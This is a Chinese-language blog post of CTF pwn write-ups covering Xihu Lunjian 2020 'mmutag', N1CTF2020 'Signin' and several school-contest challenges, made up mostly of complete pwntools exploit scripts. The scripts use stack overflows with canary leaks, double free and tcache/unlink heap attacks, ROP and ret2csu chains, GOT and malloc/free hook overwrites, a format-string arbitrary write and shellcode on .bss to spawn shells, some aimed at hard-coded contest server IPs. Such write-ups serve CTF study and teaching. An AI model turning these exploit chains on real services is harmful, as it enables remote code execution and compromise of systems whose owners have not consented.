0x00 前言

十月先是说走就走去了南京,打了天创杯,题目质量一言难尽

回来两天又被叫去南通参加工业互联网比赛,和iluemiyzyi师傅一起得了一等奖

当天晚上八点打华为杯,成绩不错破了两万分

堆了好多作业没写,也没什么时间复现题目,贴下校赛wp水一篇博客

0x01 西湖论剑2020 mmutag

一道堆栈结合的题目, introduce函数存在栈溢出,可以先泄露canary,然后伪造fakechunk,double free将堆劫持到栈上,利用ROP泄露出libc基址,泄露出libc后就可以为所欲为了,有多种思路

这是此时的栈结构

image-20201014104706034

exp

1.利用ret2csu(或者构造ROP),调用read函数,再利用ROP getshell

# encoding=utf-8
from pwn import *
# Load the target binary so its PLT/GOT entries can be looked up by name below.
elf = ELF('./mmutag')
# Run it as a local process; the remote endpoint is left commented out.
p = elf.process()
# p = remote('183.129.189.62', 58704)
# Local system libc, used only for symbol offsets. The offsets are valid only
# if the target really runs against this exact libc build.
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
# Fixed offsets that are later added to the libc base (index 1 is the one used).
one_gadget = [0x45226, 0x4527a, 0xf0364, 0xf1207]

def read_introduce1(introduce):
    """Answer the outer menu with "1", then send *introduce* without a newline."""
    menu_prompt = "input your choice:\n\n"
    p.sendlineafter(menu_prompt, "1")
    p.sendafter("your introduce \n", introduce)

def introduce():
    """Answer the outer menu with "2"."""
    menu_prompt = "input your choice:\n\n"
    p.sendlineafter(menu_prompt, "2")

def add(index, content):
    """Answer the inner menu with "1", give id *index*, then send *content* raw."""
    for prompt, reply in (("your choise:\n", "1"), ("your id:\n", str(index))):
        p.sendlineafter(prompt, reply)
    p.sendafter("your content\n", content)

def delete(index):
    """Answer the inner menu with "2" and give id *index*."""
    for prompt, reply in (("your choise:\n", "2"), ("your id:\n", str(index))):
        p.sendlineafter(prompt, reply)

def stack_leak(content):
    """Answer the inner menu with "3", then send *content* with no trailing newline."""
    menu_prompt = "your choise:\n"
    p.sendlineafter(menu_prompt, "3")
    p.send(content)

# NOTE(review): read from the defender's side, this flow depends on several
# independent weaknesses lining up: the service prints a stack address, an
# echo discloses the canary, the allocator accepts a double free, and code
# addresses are fixed. Closing any one of them breaks the chain.

# Fixed code address inside the binary (annotated elsewhere on the page as
# "pop rdi ; ret"). NOTE(review): hard-coded 0x400xxx addresses only hold if
# the binary is not built position-independent - confirm.
poprdi = 0x0000000000400d23

p.recvuntil("input you name: \n")
p.sendline("ld1ng")
# The program prints a hex value after "your tag: "; the script parses it and
# uses it as a stack address from here on.
p.recvuntil("your tag: ")
stack_address = int(p.recvuntil(":", drop=True), 16)
log.success("stack address {}".format(hex(stack_address)))
#read_introduce1(p64(0x71))
introduce()
# 0x19 filler bytes are sent; the reply is read past the first 0x18 of them and
# the next 8 bytes are taken as the stack canary.
stack_leak("1"*0x19)
p.recvuntil("Your content: ")
p.recvuntil("1"*0x18)
# The 0x19th '1' sits in the lowest byte of that value, so it is subtracted
# again (this assumes the real low byte was 0x00).
canary = u64(p.recv(8)) - ord("1")# leak canary
log.success("canary {}".format(hex(canary)))
# Fake chunk header with size field 0x71 written through the same input; the
# trailing NUL restores the canary's low byte.
stack_leak(p64(0) + p64(0x71) + p64(0)+'\x00')#build fake chunk , end of canary->00
add(1,'ld1ng')
add(2,'ld1ng')
# Free order 1, 2, 1: chunk 1 is released twice with another free in between.
delete(1)
delete(2)
delete(1) # double free
# The first 8 bytes of the re-allocated chunk are set to an address derived
# from the leaked stack address (the fake chunk).
add(3, p64(stack_address - 0x40))# fd->fake chunk
add(5,'ld1ng')
add(6,'ld1ng')
#gdb.attach(p)
# Content for the next allocation: padding, the leaked canary, a stack-derived
# value, then a sequence of code addresses and arguments.
payload = b"a"*0x8 + p64(canary)
payload += p64(stack_address + 0x10)
# puts(puts@GOT): prints a libc address.
payload += p64(poprdi) + p64(elf.got['puts']) + p64(elf.plt['puts'])
payload += p64(0x400D1C)#__libc_csu_init
# Values consumed by the __libc_csu_init sequence; they appear to set up a call
# through read@GOT with length 0x80 and a stack destination - TODO confirm
# the register order against the binary.
payload += p64(elf.got['read']) + p64(0x80) + p64(stack_address+0x28) + p64(0)
payload += p64(0x400d00) #ret2csu
add(7, payload)
#gdb.attach(p)
p.sendlineafter("your choise:\n", "4")# trigger bug

# libc base = leaked puts address minus puts' offset in the local libc file.
libc.address = u64(p.recvline().strip(b"\n").ljust(8, b"\x00")) - libc.sym['puts']
log.success("libc address {}".format(hex(libc.address)))
# Disabled alternative that used system("/bin/sh") instead of a fixed offset:
# str_sh = libc.search(b"/bin/sh\x00").next()
# log.success("str_bin/sh {}".format(hex(str_sh)))
# payload = p64(poprdi) + p64(str_sh)
# payload += p64(libc.sym['system'])
onegadget = libc.address + one_gadget[1]
log.success("one:" + hex(onegadget))
payload = p64(onegadget)
# Sent as the second-stage input after the leak.
p.send(payload)
# pause()
p.interactive()

2.老方法,利用malloc_hook和realloc_hook

# Excerpt only: p, libc, free() and new() are defined in a part of the script
# that is not shown here.
# libc base from a 6-byte leak that the script takes to be
# __libc_start_main+240.
libc_base = u64(p.recv(6).ljust(8,'\x00')) - 240 - libc.sym['__libc_start_main']
log.info("LIBC:\t"+ hex(libc_base))
# Free order 2, 1, 2: chunk 2 is released twice.
free(2)
free(1)
free(2)
# Fixed libc offset (the same value appears in the first script's one_gadget list).
rce = libc_base + 0x4527A
realloc = libc_base + libc.sym['realloc']
malloc_hook = libc_base + libc.sym['__malloc_hook']
# The re-allocated chunk's first 8 bytes are set to __malloc_hook - 0x23.
new(7,p64(malloc_hook - 0x23))
new(8,"UUUU")
new(9,'UUUU')
# Two pointers are written after 0x0b bytes of padding; the section title
# names realloc_hook and malloc_hook as the targets.
# NOTE(review): __malloc_hook/__realloc_hook were removed in glibc 2.34, so
# this write target does not exist on current glibc.
new(10,'\x00'*(0x13 - 8) + p64(rce) + p64(realloc + 4))
# Same index freed twice in a row; how that reaches the overwritten hook is
# not shown in this excerpt.
free(1)
free(1)
p.interactive()

3.两次double free 两次rop

#leak libc_base
# Excerpt only: sh, libc, canary, stack_addr, poprdi, main, add() and delete()
# are defined outside it.
# Take the 6 bytes ending at the first 0x7f byte as the address of puts.
puts_addr=u64(sh.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
libc_base=puts_addr-libc.symbols["puts"]
system_addr=libc_base+libc.symbols["system"]
binsh=libc_base+libc.search("/bin/sh").next()
info("libc_base:0x%x",libc_base)

#try again
# Second pass: menu option 3 is used to write a fake chunk header (size 0x71).
sh.recvuntil("please input your choise:")
sh.sendline("3")
payload=p64(0)+p64(0x71)
sh.sendline(payload)
# Free order 1, 2, 1: chunk 1 is released twice.
delete(1)
delete(2)
delete(1)
# The re-allocated chunk's first 8 bytes are set to a stack-derived address.
payload=p64(stack_addr-0x20)
add(7,payload)
add(8,'cccc')
add(9,'dddd')
# Padding, the previously leaked canary, 8 filler bytes, then
# system("/bin/sh") followed by main as the address after it.
payload="a"*8+p64(canary)
payload+="b"*8+p64(poprdi)+p64(binsh)
payload+=p64(system_addr)+p64(main)
add(10,payload)
# Menu option 4 leaves the function, which is where the overwritten return
# address is used.
sh.recvuntil("please input your choise:")
sh.sendline("4")
sh.interactive()

4.利用read覆盖atoi@GOT

因此ROP链为:

puts(puts@GOT)泄露libc地址

read(0, atoi@GOT, …)劫持GOT

返回到ReadInt触发system

# Excerpt only: sh, elf, libc, canary, buf, Add() and Leave() are defined
# outside it. The chain follows the three steps listed in the text above.
exp = p64(0) #fd
exp+= p64(canary)
exp+= p64(buf)
# NOTE(review): no "pop rdi" address precedes puts@GOT here, unlike the other
# variants on the page - presumably rdi is set some other way; confirm.
exp+= p64(elf.got['puts'])
exp+= p64(elf.plt['puts']) #puts(puts@GOT)
exp+= p64(0x400d23) #pop rdi ; ret
exp+= p64(0) #STDIN
exp+= p64(0x400d21) #pop rsi ; pop r15 ; ret
exp+= p64(elf.got['atoi'])
exp+= p64(0)
exp+= p64(elf.plt['read']) #read(STDIN, atoi@GOT, ...)
exp+= p64(0x400942) # Read option
Add(6, exp)
Leave() #trigger
# libc base = leaked puts address minus puts' offset in the libc file.
puts_addr = u64(sh.recv(6).ljust(8, '\x00'))
libc.address = puts_addr - libc.symbols['puts']
log.success('libc base = '+hex(libc.address))
# Answers the queued read(): the GOT slot of atoi now holds system's address,
# so the next "number" the program parses is run as a command instead.
# NOTE(review): this needs a writable GOT; full RELRO would make the slot
# read-only.
sh.send(p64(libc.symbols['system'])) #atoi@GOT = system@LIBC
sh.sendline('/bin/sh')
sh.interactive()

…你学废了吗

0x02 N1CTF2020 Signin

c++完全读不懂,全靠动调分析程序,用的vector

bss段储存内存块 1 2 信息的3个指针

指针1和3是一个边界指针,指针2是数据编辑指针。根据指针2处来写number数据。

当指针2大小超过指针3,其就会申请一块新的内存,其申请完内存大小是以0x20,0x20,0x30,0x50,0x90,0x110,0x210,0x410,0x810,0x1010 这样递增。

申请完新内存,会把上一块chunk free,并把上一块内存中的number值进行拷贝到新申请的内存中。并且会根据申请到的chunk地址,进行对bss段3个指针的更新

exp

思路add多次绕过tcache,通过unsortedbin泄露libc基址

最后接着free,让指针2指向0x20的fd处,修改其为free hook ,并改为system,再次free触发漏洞

from pwn import *
# Run the challenge binary as a local process.
s = process("./signin")
# Local system libc, used only for symbol offsets.
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
def add(idx,num):
    """Answer the menu with "1", then send *idx* and *num* as decimal text."""
    exchange = ((">>", "1"), ("Index:", str(idx)), ("Number:", str(num)))
    for prompt, reply in exchange:
        s.sendlineafter(prompt, reply)
def free(idx):
    """Answer the menu with "2", then send *idx* as decimal text."""
    for prompt, reply in ((">>", "2"), ("Index:", str(idx))):
        s.sendlineafter(prompt, reply)
def show(idx):
    """Answer the menu with "3", then send *idx* as decimal text."""
    for prompt, reply in ((">>", "3"), ("Index:", str(idx))):
        s.sendlineafter(prompt, reply)
# NOTE(review): the listing lost its indentation; each loop is taken to cover
# only the single call that follows it - confirm against the original script.
# 0x101 insertions into container 1 (the text says the backing buffer is
# re-allocated in growing sizes as it fills).
for i in range(0x101):
    add(1,1)
# 0x202 removals - more than were inserted, so the write pointer ends up below
# the start of the live data (per the description above).
for i in range(0x202):
    free(1)
show(1)
# The program prints the value in decimal; it is taken as a libc pointer and
# 0x70 plus __malloc_hook's offset is subtracted to get the libc base.
libc_base = int(s.recv(15),10)- 0x70 - libc.sym['__malloc_hook']
info(hex(libc_base))
free_hook = libc.sym['__free_hook'] + libc_base
system = libc_base + libc.sym['system']
info(hex(system))
# Keep removing so the write pointer lands on a freed 0x20 chunk's link field
# (per the description above).
for i in range(0x10d):
    free(1)
show(1)
# The link is replaced with __free_hook - 8, then "/bin/sh" and system's
# address are stored through container 2.
# NOTE(review): __free_hook was removed in glibc 2.34, so this target is gone
# on current glibc.
add(1,free_hook-0x8)
add(2,u64("/bin/sh\x00"))
add(2,system)
s.interactive()

0x03 CUMTCTF

我习惯每次都用Ubuntu 16.04在本地做,比赛libc是2.27,往往需要大改,校赛题目改exp比写的时间还长! ̄へ ̄

0x00 login

远程连接超时,可能是system没对齐的原因,当时没考虑太多直接采用蠢比写法。。

from pwn import *
# Load the binary for symbol lookups; the script talks to the contest service.
elf = ELF('./login')
#p = elf.process()
#context.log_level = 'debug'
p = remote('219.219.61.234', 10000)
# Fixed code address that is called with one argument further down.
sys = 0x4006F0
# Start of the binary's .bss section, used as scratch space for a string.
bssaddr = elf.bss()
p.recvuntil("choice:")
p.sendline('1')
p.recvuntil("username")
p.sendline('cat flag')
p.recvuntil("password")
# Password input: 0x40 filler bytes plus 8 more reach the saved return
# address, so the prompt's stated length limit is not enforced by the read.
# The addresses that follow presumably load arguments for read(0, bss, ...)
# and then return to 0x400A36 - TODO confirm the gadgets against the binary.
payload = 'a'*0x40 + 'b'*0x8 + p64(0x400be3) + p64(0) + p64(0x400be1) + p64(bssaddr) + p64(0) + p64(elf.sym['read']) + p64(0x400A36)
p.sendline(payload)
# Answers that read(): the command string ends up in .bss.
p.sendline('cat flag')
p.recvuntil("username(length less than 20):")
p.sendline('123456')
p.recvuntil("password(length less than 20):")
# Second overflow: the fixed address `sys` is reached with the .bss string as
# its argument, then execution continues at 0x0400AF9.
payload = 'a'*0x40 + 'b'*0x8 + p64(0x400be3) + p64(bssaddr) + p64(sys) + p64(0x0400AF9)
p.sendline(payload)
#pause()
p.interactive()

0x01 login_plus

longlong型(64位)和int型(32位),整数溢出

from pwn import *
# NOTE(review): Python 2 script (`print payload` below is a statement).
elf = ELF('./login')
#p = elf.process()
#context.log_level = 'debug'
p = remote('219.219.61.234', 10001)
# sys and bssaddr are carried over from the previous script and unused here.
sys = 0x4006F0
bssaddr = elf.bss()
p.recvuntil("choice:")
p.sendline('1')
p.recvuntil('Enter your id!')
# 2**32: non-zero as a 64-bit value, zero once truncated to 32 bits. The text
# above attributes the bug to a long long / int mismatch.
# NOTE(review): the fix is to parse, check and use the id at one integer width
# and to reject out-of-range input.
payload = pow(2,32)
print payload
p.sendline('4294967296')
# Disabled experiments from an earlier attempt:
# p.recvuntil('Enter your id!')
# p.sendline('0')
# p.recvuntil("username(length less than 20)")
# p.send('test')
# p.recvuntil("password(length less than 20)")
# gdb.attach(p)
# p.send('a'*0x18 + p64(0x6011D0))
# p.send('test')

p.interactive()

0x02 not_implemented_login_service

bss段写shellcode,ret2bss

ROP的方法打不通不明原因…

from pwn import *
# './login''' is './login' followed by an empty string literal, i.e. './login'.
elf = ELF('./login''')
#p = elf.process()
p = remote('219.219.61.234',10004)
#context.log_level = 'debug'
context(arch = 'amd64',os = 'linux')
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc = ELF('libc-2.27.so')
# Stock pwntools shell payload assembled for amd64/linux.
shellcode = asm(shellcraft.sh())
# Fixed address the script later returns to; the text above says the
# username buffer lives in .bss.
addr = 0x601060
p.recvuntil("username:")
p.sendline(shellcode)
# Second input: a string padded to 0x10 bytes, 8 filler bytes, then `addr`
# in the position of the saved return address.
# NOTE(review): this only works if that data region is executable; a
# non-executable .bss (NX) plus a bounded read would each stop it.
payload='pwnht'.ljust(0x10,'\x00') + 'b'*8 + p64(addr)
#p.recvuntil('password:')
p.sendline(payload)
p.interactive()

0x03 note_service

泄露libc基址,栈地址和返回地址,格式化字符串任意地址写

from pwn import *
# Load the binary and set the pwntools target to amd64/linux.
elf = ELF('./note_service')
context(arch='amd64',os='linux')
#p = elf.process()
# Verbose logging of all traffic.
context.log_level = 'debug'
p = remote('219.219.61.234', 10002)
# libc 2.27 file used for symbol offsets.
libc = ELF('libc-2.27.so')
# Fixed libc offsets; index 0 is the one added to the libc base below.
onegadget = [0x4f2c5, 0x4f322,0x10a38c,0xf1207]
def leak(con):
    """Submit *con* as a note and return the hex value echoed before the '-'.

    After reading the value it answers the '????' prompt with '123'.
    """
    p.recvuntil('input your note:')
    p.sendline(str(con))
    p.recvuntil("is:")
    echoed = p.recvuntil("-")
    mm = int(echoed.strip('-'), 16)
    p.recvuntil('????')
    p.sendline('123')
    return mm
# NOTE(review): every leak below works because the note text is interpreted as
# a format string (presumably passed directly to a printf-style call). Printing
# the note through a fixed "%s" format removes both the reads and the write.
p.recvuntil('input your name:')
p.sendline('ld1ng')
# Positional argument 38 minus 0xd8; the text above says the return address
# location is what is being recovered.
stack = leak("%38$p-") - 0xd8
# The log label says "libc + 240" but the value printed is `stack`.
info("libc + 240:" + hex(stack))
canary = leak('%39$p-')
info("canary:" + hex(canary))
# Positional argument 41 is taken to be __libc_start_main+231.
libc_base = leak('%41$p-') - 231 -libc.sym['__libc_start_main']
info("libc_base:" + hex(libc_base))
one_gadget = libc_base + onegadget[0]
# pwntools builds a format string (first controlled argument at offset 6) that
# writes `one_gadget` to the address in `stack`.
payload = fmtstr_payload(6,{stack:one_gadget})
p.recvuntil('note:')
p.sendline(payload)
p.recv()
p.recvuntil('????')
p.sendline('yes')
#gdb.attach(p)
p.interactive()

0x04 messagesystem

tcache + unlink,改写free_got为system

哇,在Ubuntu 16.04上做出来之后才得知是libc 2.27,改了好久

#coding=utf-8
from pwn import *
#context.log_level='debug'
#sh=process("./messagesystem")
# Target architecture/OS for the pwntools helpers.
context(arch='amd64',os='linux')
# Connects to the contest service; the local-process line above is disabled.
sh = remote('219.219.61.234', 10003)
# libc 2.27 file used for symbol offsets.
libc=ELF("libc-2.27.so")
#libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
#og = [0x4f2c5,0x4f322,0x10a38c]
def add(idx,size,content):
    """Answer "choice:" with 1, give slot *idx* and *size*, then send *content* raw."""
    exchange = (
        ("choice:", str(1)),
        ('Now Leave Message!', str(idx)),
        ("want to leave?", str(size)),
    )
    for prompt, reply in exchange:
        sh.recvuntil(prompt)
        sh.sendline(reply)
    sh.recvuntil("want to say?")
    sh.send(content)

def edit(idx,content):
    """Answer "choice:" with 4, give slot *idx*, then send *content* raw."""
    for prompt, reply in (("choice:", str(4)), ("want to edit?", str(idx))):
        sh.recvuntil(prompt)
        sh.sendline(reply)
    sh.recvuntil("enter your Message!")
    sh.send(content)

def show(idx):
    """Answer "choice:" with 2 and give slot *idx*."""
    for prompt, reply in (("choice:", str(2)), ("want to show?", str(idx))):
        sh.recvuntil(prompt)
        sh.sendline(reply)

def delete(idx):
    """Answer "choice: " with 3 and give slot *idx*."""
    for prompt, reply in (("choice: ", str(3)), ("want to delete?", str(idx))):
        sh.recvuntil(prompt)
        sh.sendline(reply)

# Twelve slots, each requesting 136 bytes.
add(0,136,'a'*16)
add(1,136,'b'*8)
add(2,136,'c'*8)
add(3,136,'/bin/sh')
add(4,136,'e'*8)
add(5,136,'a')
add(6,136,'a')
add(7,136,'a')
add(8,136,'a')
add(9,136,'a')
add(10,136,'a')
add(11,136,'a')
# Release slots 0-7. NOTE(review): presumably seven of the eight fill the
# tcache bin and the last one goes to the unsorted bin, leaving a libc pointer
# in its data - confirm against libc 2.27.
delete(0)
delete(1)
delete(2)
delete(3)
delete(4)
delete(5)
delete(6)
delete(7)
# Take the chunks back while writing a single byte (0xa0), so the rest of the
# stale contents stays in place; slot 3 receives the command string instead.
add(7,130,p8(0xa0))
add(6,130,p8(0xa0))
add(5,130,p8(0xa0))
add(4,130,p8(0xa0))
add(3,130,'cat flag')
add(2,130,p8(0xa0))
add(1,130,p8(0xa0))
add(0,130,p8(0xa0))
# Printing slot 0 returns those stale bytes: the chunk was not cleared on
# allocation.
show(0)
sh.recv()
# uu64(sh.recv(6))
#libc_base = u64(sh.recv(7).ljust(8,'\x00'))-0x70-libc.sym['__malloc_hook']
# Take the 6 bytes ending at the first 0x7f byte as a pointer and subtract
# 0x70 plus __malloc_hook's offset to get the libc base.
libc_base = u64(sh.recvuntil('\x7f')[-6:] + '\x00\x00')-0x70-libc.sym['__malloc_hook']
info("libc_base:" + hex(libc_base))

delete(5)
delete(6)
delete(7)
delete(8)
delete(9)
delete(10)
delete(11)
# Fake chunk to be placed in slot 1: two 8-byte header fields (0 and 8), two
# pointers at 0x601568-0x18 and 0x601568-0x10, 0x60 filler bytes, then 0x80 and
# 0x90 for the following chunk's header. The section summary names the
# technique "tcache + unlink".
# NOTE(review): the payload is 0x90 bytes while the slot is requested with
# size 130, so the write presumably runs past the requested length - confirm.
payload = p64(0)+p64(8)+p64(0x601568-0x8*3) + p64(0x601568-0x8*2)+ 0x60*'A'
payload += p64(0x80)+ p64(0x90)
delete(1)

add(11,130,'e'*8)
add(10,130,'a')
add(9,130,'a')
add(8,130,'a')
add(7,130,'a')
add(6,130,'a')
add(5,130,'a')
add(1,130,payload)
delete(5)
delete(6)
delete(7)
delete(8)
delete(9)
delete(10)
delete(11)
# Freeing slot 2 is the step that consumes the forged header in slot 1.
delete(2)
# Editing slot 1 now writes 0x601480 at offset 0x10 of wherever slot 1 points;
# the next edit goes through slot 0, so that is presumably slot 0's pointer.
# The summary says the GOT entry of free is the target.
payload = 'a'*0x10 + p64(0x601480)
edit(1,payload)
#
#onegadget = libc_base + og[3]
system0 = libc_base + libc.sym['system']
info(hex(system0))
#info(hex(onegadget))

# The entry is overwritten with system's address.
# NOTE(review): a writable GOT is a precondition; full RELRO would make the
# entry read-only.
edit(0,p64(system0))
#gdb.attach(sh)
# Slot 3 holds 'cat flag', so releasing it passes that string to the
# overwritten entry.
delete(3)
#
sh.interactive()

0x05 messagesystem_plus

阿这。。感觉是非预期,同样的脚本稍微改一改就能用

#coding=utf-8
from pwn import *
#context.log_level='debug'
# Runs the binary locally; the contest endpoint below is commented out.
sh=process("./messageSystem_plus")
#sh = remote('219.219.61.234', 10005)
# libc 2.27 file used for symbol offsets.
libc=ELF("libc-2.27.so")
#libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
#og = [0x4f2c5,0x4f322,0x10a38c,0xf1207]
#og = [0x4f2c5,0x4f322,0x10a38c]
def add(idx,size,content):
    """Answer "choice:" with 1, give slot *idx* and *size*, then send *content* raw."""
    exchange = (
        ("choice:", str(1)),
        ('Now Leave Message!', str(idx)),
        ("want to leave?", str(size)),
    )
    for prompt, reply in exchange:
        sh.recvuntil(prompt)
        sh.sendline(reply)
    sh.recvuntil("want to say?")
    sh.send(content)

def edit(idx,content):
    """Answer "choice:" with 4, give slot *idx*, then send *content* raw."""
    for prompt, reply in (("choice:", str(4)), ("want to edit?", str(idx))):
        sh.recvuntil(prompt)
        sh.sendline(reply)
    sh.recvuntil("enter your Message!")
    sh.send(content)

def show(idx):
    """Answer "choice:" with 2 and give slot *idx*."""
    for prompt, reply in (("choice:", str(2)), ("want to show?", str(idx))):
        sh.recvuntil(prompt)
        sh.sendline(reply)

def delete(idx):
    """Answer "choice: " with 3, pick sub-option 2, then give slot *idx*."""
    exchange = (
        ("choice: ", str(3)),
        ("Single Message", str(2)),
        ("you want to delete?", str(idx)),
    )
    for prompt, reply in exchange:
        sh.recvuntil(prompt)
        sh.sendline(reply)

# Same sequence as the messagesystem script; only the fixed addresses and the
# delete() dialogue differ.
# Twelve slots, each requesting 136 bytes.
add(0,136,'a'*16)
add(1,136,'b'*8)
add(2,136,'c'*8)
add(3,136,'/bin/sh')
add(4,136,'e'*8)
add(5,136,'a')
add(6,136,'a')
add(7,136,'a')
add(8,136,'a')
add(9,136,'a')
add(10,136,'a')
add(11,136,'a')
# Release slots 0-7. NOTE(review): presumably seven of the eight fill the
# tcache bin and the last one goes to the unsorted bin - confirm against
# libc 2.27.
delete(0)
delete(1)
delete(2)
delete(3)
delete(4)
delete(5)
delete(6)
delete(7)
# Take the chunks back while writing a single byte (0xa0) so the stale
# contents stay in place; slot 3 receives the command string.
add(7,130,p8(0xa0))
add(6,130,p8(0xa0))
add(5,130,p8(0xa0))
add(4,130,p8(0xa0))
add(3,130,'cat flag')
add(2,130,p8(0xa0))
add(1,130,p8(0xa0))
add(0,130,p8(0xa0))

# Printing slot 0 returns the stale bytes left in the chunk.
show(0)
sh.recv()
# uu64(sh.recv(6))
#libc_base = u64(sh.recv(7).ljust(8,'\x00'))-0x70-libc.sym['__malloc_hook']
# Take the 6 bytes ending at the first 0x7f byte as a pointer and subtract
# 0x70 plus __malloc_hook's offset to get the libc base.
libc_base = u64(sh.recvuntil('\x7f')[-6:] + '\x00\x00')-0x70-libc.sym['__malloc_hook']
info("libc_base:" + hex(libc_base))
#gdb.attach(sh)
delete(5)
delete(6)
delete(7)
delete(8)
delete(9)
delete(10)
delete(11)
# Fake chunk for slot 1: two 8-byte header fields (0 and 8), two pointers at
# 0x6017a8-0x18 and 0x6017a8-0x10, 0x60 filler bytes, then 0x80 and 0x90 for
# the following chunk's header.
payload = p64(0)+p64(8)+p64(0x6017a8-0x8*3) + p64(0x6017a8-0x8*2)+ 0x60*'A'
payload += p64(0x80)+ p64(0x90)
delete(1)

add(11,130,'e'*8)
add(10,130,'a')
add(9,130,'a')
add(8,130,'a')
add(7,130,'a')
add(6,130,'a')
add(5,130,'a')
add(1,130,payload)
#gdb.attach(sh)
delete(5)
delete(6)
delete(7)
delete(8)
delete(9)
delete(10)
delete(11)
# Freeing slot 2 is the step that consumes the forged header in slot 1.
delete(2)
# Editing slot 1 writes this address at offset 0x10 of wherever slot 1 now
# points; the next edit goes through slot 0.
payload = 'a'*0x10 + p64(0x6016a8)# GOT entry of free (original comment: "free_go")
edit(1,payload)
#onegadget = libc_base + og[1]
system0 = libc_base + libc.sym['system']
info(hex(system0))
#info(hex(onegadget))

# The entry is overwritten with system's address.
# NOTE(review): a writable GOT is a precondition; full RELRO would make the
# entry read-only.
edit(0,p64(system0))
#gdb.attach(sh)
# Slot 3 holds 'cat flag', so releasing it passes that string to the
# overwritten entry.
delete(3)
#
sh.interactive()

0x06 mail_service

tcache + uaf ,劫持free_hook为onegadget

from pwn import *
# context(arch='amd64',os='linux')
# context.log_level='debug'
#sh=process("./mail_service")
# Connects to the contest service; the local-process line above is disabled.
sh = remote('219.219.61.234', 10006)
# libc 2.27 file used for symbol offsets.
libc=ELF("libc-2.27.so")
# libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
# Fixed libc offsets; index 1 is the one added to the libc base below.
og = [0x4f2c5,0x4f322,0x10a38c]
def reg():
    """Answer "your choice:" with 1 and submit the fixed name and password."""
    exchange = (
        ("your choice:", str(1)),
        ("input your name:", 'ld1ng'),
        ("input your password:", '123'),
    )
    for prompt, reply in exchange:
        sh.recvuntil(prompt)
        sh.sendline(reply)

def login():
    """Answer "your choice:" with 2 and submit the fixed name and password."""
    exchange = (
        ("your choice:", str(2)),
        ("input your name:", 'ld1ng'),
        ("input your password:", '123'),
    )
    for prompt, reply in exchange:
        sh.recvuntil(prompt)
        sh.sendline(reply)

def add(idx,size,content):
    """Answer "choice:" with 1 and create mail *idx* of *size* bytes.

    Receiver and title are sent as empty lines; *content* is sent raw.
    """
    exchange = (
        ("choice:", str(1)),
        ('your mail index:', str(idx)),
        ('input your receiver:', ''),
        ('input your title:', ''),
        ("input your mail length:", str(size)),
    )
    for prompt, reply in exchange:
        sh.recvuntil(prompt)
        sh.sendline(reply)
    sh.recvuntil("input your mail context:")
    sh.send(content)

def edit(idx,content):
    """Answer "choice:" with 4 and rewrite mail *idx*.

    Receiver and title are sent as empty lines; *content* is sent raw.
    """
    exchange = (
        ("choice:", str(4)),
        ("your mail index:", str(idx)),
        ('input your receiver:', ''),
        ('input your title:', ''),
    )
    for prompt, reply in exchange:
        sh.recvuntil(prompt)
        sh.sendline(reply)
    sh.recvuntil("input your mail context:")
    sh.send(content)

def show(idx):
    """Answer "choice:" with 2 and give mail index *idx*."""
    for prompt, reply in (("choice:", str(2)), ("your mail index:", str(idx))):
        sh.recvuntil(prompt)
        sh.sendline(reply)

def delete(idx):
    """Answer "choice:" with 3 and give mail index *idx*."""
    for prompt, reply in (("choice:", str(3)), ("your mail index:", str(idx))):
        sh.recvuntil(prompt)
        sh.sendline(reply)

# NOTE(review): the listing lost its indentation; each loop is taken to cover
# only the single call that follows it - confirm against the original script.
reg()
login()
# Ten mails of 144 bytes each.
for i in range(10):
    add(i,144,'aaa')
# Release mails 0-6 and then 7. NOTE(review): presumably the first seven fill
# the tcache bin and the eighth goes to the unsorted bin - confirm against
# libc 2.27.
for i in range(7):
    delete(i)
delete(7)
# Take them back in reverse order, then re-create mail 7 with only 8 bytes
# written so the data after them stays in place.
for i in range(6,-1,-1):
    add(i,144,'aaa')
add(7,144,'a'*8)
# Printing mail 7 returns the 8 bytes plus whatever was left behind them.
show(7)
sh.recvuntil('a'*8)
# Take the 6 bytes ending at the first 0x7f byte as a pointer and subtract
# 0x70 plus __malloc_hook's offset to get the libc base.
libc_base = u64(sh.recvuntil('\x7f')[-6:] + '\x00\x00')-0x70-libc.sym['__malloc_hook']
info(hex(libc_base))
onegadget = libc_base + og[1]
info(hex(onegadget))
# malloc_hook, system and fake_chunk are computed but only logged or unused in
# the steps below.
malloc_hook = libc_base + libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym['__free_hook']
system = libc_base + libc.sym['system']
info(hex(free_hook))
fake_chunk = malloc_hook - 0x23
#payload = '\x00'*(0x23-8) + p64(onegadget)
info(hex(fake_chunk))
delete(1)
delete(0)
# Mail 0 was just released but can still be edited (the use-after-free named in
# the summary); its first bytes are set to the address of __free_hook.
edit(0, p64(free_hook)+p64(free_hook))
edit(2,'cat flag')
add(12, 144, 'A'*0x10)
# This allocation's content is the fixed-offset address; per the summary it
# lands on __free_hook.
# NOTE(review): __free_hook was removed in glibc 2.34, and clearing the slot
# pointer on delete would remove the stale reference used above.
add(13,140,p64(onegadget))
# Releasing any mail now goes through the overwritten hook.
delete(2)
#gdb.attach(sh,"b *$rebase(0x202060)")
sh.interactive()

0x07 safe_vpn

真非预期,学长说环境没配好,只要有人nc,admin.txt就自动清空,不知道是什么原因

白给题

from pwn import *
# elf and libc are loaded but only elf.arch is used below.
elf = ELF('./vpn')
#context.log_level = 'debug'
#io = process(local_file)
io = remote('219.219.61.234', 20007)
libc = ELF('libc-2.27.so')
context.arch = elf.arch
# A single NUL byte is sent for both name and password. The text above says
# admin.txt was emptied whenever someone connected.
# NOTE(review): presumably an empty stored credential then compares equal to
# an empty input; a login check should fail closed when the credential store is
# empty or unreadable - confirm against the service.
io.sendafter('name','\x00')
io.sendafter('password','\x00')
io.interactive()

0x04 小结

十月总结:太菜了…